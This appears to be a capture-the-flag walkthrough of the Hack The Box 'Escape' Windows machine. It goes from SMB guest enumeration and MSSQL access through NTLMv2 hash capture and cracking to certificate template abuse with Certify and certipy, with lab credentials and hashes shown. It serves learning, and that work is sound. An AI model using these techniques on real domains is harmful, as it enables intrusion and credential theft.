Escape

Medium Windows Box

Nmap Scan

$ nmap -sC -sV -Pn -oN nmap 10.10.11.202
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 09:13 +08
Nmap scan report for 10.10.11.202
Host is up (0.060s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-20 09:07:58Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-05-20T09:09:19+00:00; +7h54m36s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2024-05-19T01:27:27
|_Not valid after:  2025-05-19T01:27:27
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-05-20T09:09:18+00:00; +7h54m36s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2024-05-19T01:27:27
|_Not valid after:  2025-05-19T01:27:27
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-05-18T17:37:48
|_Not valid after:  2054-05-18T17:37:48
|_ssl-date: 2024-05-20T09:09:19+00:00; +7h54m36s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.202:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2024-05-19T01:27:27
|_Not valid after:  2025-05-19T01:27:27
|_ssl-date: 2024-05-20T09:09:19+00:00; +7h54m36s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-05-20T09:09:18+00:00; +7h54m36s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2024-05-19T01:27:27
|_Not valid after:  2025-05-19T01:27:27
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-20T09:08:42
|_  start_date: N/A
|_clock-skew: mean: 7h54m36s, deviation: 0s, median: 7h54m35s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.98 seconds

Initial Access

Guest account in SMB

When trying with guestaccount for enum4linux, we realised that there is share folder that we are able to access.

$ enum4linux -a -u 'guest' -p ''  10.10.11.202
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 20 09:22:14 2024

 =========================================( Target Information )=========================================

Target ........... 10.10.11.202
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
=================================( Share Enumeration on 10.10.11.202 )=================================
                                                                                                                                                                                                                                                                                         
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                                                                                                                                                                                  

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.202                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                         
//10.10.11.202/ADMIN$   Mapping: DENIED Listing: N/A Writing: N/A                                                                                                                                                                                                                        
//10.10.11.202/C$       Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                         
NT_STATUS_NO_SUCH_FILE listing \*                                                                                                                                                                                                                                                        
//10.10.11.202/IPC$     Mapping: N/A Listing: N/A Writing: N/A
//10.10.11.202/NETLOGON Mapping: OK Listing: DENIED Writing: N/A
//10.10.11.202/Public   Mapping: OK Listing: OK Writing: N/A
//10.10.11.202/SYSVOL   Mapping: OK Listing: DENIED Writing: N/A

After going into that share folder, we will see that there is an SQL Server Procedures file inside.

$ smbclient //10.10.11.202/Public -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 19:51:25 2022
  ..                                  D        0  Sat Nov 19 19:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 21:39:43 2022

                5184255 blocks of size 4096. 1426808 blocks available

We will then download the file to our local machine.

smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (232.6 KiloBytes/sec) (average 232.6 KiloBytes/sec)
smb: \> exit

In the PDF file, there are a few interesting things. There are instructions on how to access the SQL Server from a non domain joined machine.

There is instructions about what account to use for new hired and users that are still waiting to be created.

So, we will then connect to the MSSQL Server using impacket-mssqlclient.

$ impacket-mssqlclient PublicUser@10.10.11.202
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

Password:
[*] Encryption required, switching to TLS
                                                                                                                                                                                                                  
┌──(ranay㉿kali)-[~/Desktop]
└─$ impacket-mssqlclient PublicUser@10.10.11.202
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)>

Getting Net-NTLMv2 for sql_svc

Page not found - HackTricksbook.hacktricks.xyz

We will start responder on kali.

Next, we will run the follow command so that we can capture the sql_svc's NTLMv2 hash on responder.

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:776bc9cc0c1b67ff:EAFE2D1255B5092F3ECAF539F118131F:01010000000000000021B22599AADA01A57AAA0960B1229E0000000002000800580046005A00470001001E00570049004E002D00310035004F005A0053004A0051004A0035005400490004003400570049004E002D00310035004F005A0053004A0051004A003500540049002E00580046005A0047002E004C004F00430041004C0003001400580046005A0047002E004C004F00430041004C0005001400580046005A0047002E004C004F00430041004C00070008000021B22599AADA0106000400020000000800300030000000000000000000000000300000EA7CB7A0E84E13CF46C54173FF93650B20A3D14C6D4E0485E7A1F22C16C67C530A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000

After which, we will try to crack it to get the password.

$ echo 'sql_svc::sequel:776bc9cc0c1b67ff:EAFE2D1255B5092F3ECAF539F118131F:01010000000000000021B22599AADA01A57AAA0960B1229E0000000002000800580046005A00470001001E00570049004E002D00310035004F005A0053004A0051004A0035005400490004003400570049004E002D00310035004F005A0053004A0051004A003500540049002E00580046005A0047002E004C004F00430041004C0003001400580046005A0047002E004C004F00430041004C0005001400580046005A0047002E004C004F00430041004C00070008000021B22599AADA0106000400020000000800300030000000000000000000000000300000EA7CB7A0E84E13CF46C54173FF93650B20A3D14C6D4E0485E7A1F22C16C67C530A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000' > hash.txt
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force

The password for the sql_svc is REGGIE1234ronnie.

SQL_SVC::sequel:776bc9cc0c1b67ff:eafe2d1255b5092f3ecaf539f118131f:01010000000000000021b22599aada01a57aaa0960b1229e0000000002000800580046005a00470001001e00570049004e002d00310035004f005a0053004a0051004a0035005400490004003400570049004e002d00310035004f005a0053004a0051004a003500540049002e00580046005a0047002e004c004f00430041004c0003001400580046005a0047002e004c004f00430041004c0005001400580046005a0047002e004c004f00430041004c00070008000021b22599aada0106000400020000000800300030000000000000000000000000300000ea7cb7a0e84e13cf46c54173ff93650b20a3d14c6d4e0485e7a1f22c16c67c530a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0035000000000000000000:REGGIE1234ronnie

Next, we will try to see if it is able to be used on winrm and sure enough it is able to run.

After logging into the user using evil-winrm, we will start to enumerated the machine and will come accross something interesting in the SQL log files. It seems that is the username and password of another user.

2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

Finally, we will log in using evil-winrm and sure enough we are able to login and get the user flag

Privilege Escalation

Certificate Template vulnerability

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:09.1933788

$ certipy-ad req -username ryan.cooper@sequel.htb -password NuclearMosquito3  -target sequel.htb -ca 'sequel-DC-CA' -template 'UserAuthentication' -upn 'administrator@sequel.htb'
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Fixing the “Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)” Issue While KerberoastingMedium